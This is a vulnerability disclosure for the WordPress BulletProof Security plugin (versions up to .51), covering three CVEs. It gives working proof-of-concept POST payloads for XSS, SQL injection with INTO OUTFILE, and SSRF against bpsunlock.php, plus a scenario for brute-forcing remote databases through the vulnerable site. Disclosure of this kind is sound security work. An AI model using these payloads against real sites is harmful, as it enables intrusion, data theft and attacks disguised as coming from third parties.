Headline
CVE-2014-7959: WordPress Bulletproof-Security .51 XSS / SQL Injection
SQL injection vulnerability in admin/htaccess/bpsunlock.php in the BulletProof Security plugin before .51.1 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the tableprefix parameter.
Vulnerability title: Wordpress bulletproof-security <=.51 multiplevulnerabilitiesAuthor: Pietro OlivaCVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749Vendor: AITproProduct: bulletproof-securityAffected version: bulletproof-security <= .51Vulnerabilities fixed in version: .51.1Details:xss vulnerability (CVE-2014-7958):POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.phpHTTP/1.1dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+AccountSQL injection vulnerability (CVE-2014-7959, correct db username andpassword is required in order to exploit this):POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.phpHTTP/1.1dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+AccountSSRF vulnerability (CVE-2014-8749)POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.phpHTTP/1.1dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+AccountPossible scenario:- the user sends a request with username, password, host and otherparameters to the vulnerable page- the server doesn't check the host parameter to be in a whitelist ofpermitted databases- the server performs an authentication request to a remote orinternal network database and gives back to the attacker theauthentication result-After n attemps the attacker has bypassed access restrictions (ifany) to the remote database, discovered the remote database password,and made it appear bulletproof-security as the source of the attack.Extra step:-If the sql injection flaw (CVE-2014-7959) is not fixed, an attackercould also execute arbitrary sql statement on the remote server, asthe vulnerable page executes a query if the authentication issuccessful (without filtering or use prepared statements). The sourceof the attack would appear to be the bulletproof-security vulnerablesite.